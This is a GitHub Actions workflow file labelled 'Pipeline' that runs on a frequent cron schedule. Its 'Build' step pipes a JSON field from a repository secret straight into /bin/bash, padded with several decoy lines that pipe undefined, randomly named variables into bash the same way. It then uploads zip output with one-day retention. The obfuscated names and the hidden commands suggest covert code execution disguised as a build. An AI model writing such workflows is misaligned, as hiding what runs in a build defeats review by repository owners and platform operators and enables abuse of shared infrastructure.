name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '17 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  operation:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Build
        env:
          ul3127: ${{ secrets.ul3127 }}
        run: |
          printf '%s' "$ul3127" | jq -r .thcnq247 | /bin/bash
          printf '%s' "$rqjjv16" | jq -r .r05 | /bin/bash
          echo $l23187 | jq -r .cx569 | /bin/bash
          printf '%s' "$ymk2" | jq -r .mav7556 | /bin/bash
          echo $cgijl340 | jq -r .ygso57475 | /bin/bash
          printf '%s' "$cne4" | jq -r .iezi3610 | /bin/bash
          echo $jdbm70521 | jq -r .f5 | /bin/bash

      - name: Archive output
        uses: actions/upload-artifact@v4
        with:
          name: GigWom8p
          path: "*.zip"
          retention-days: 1
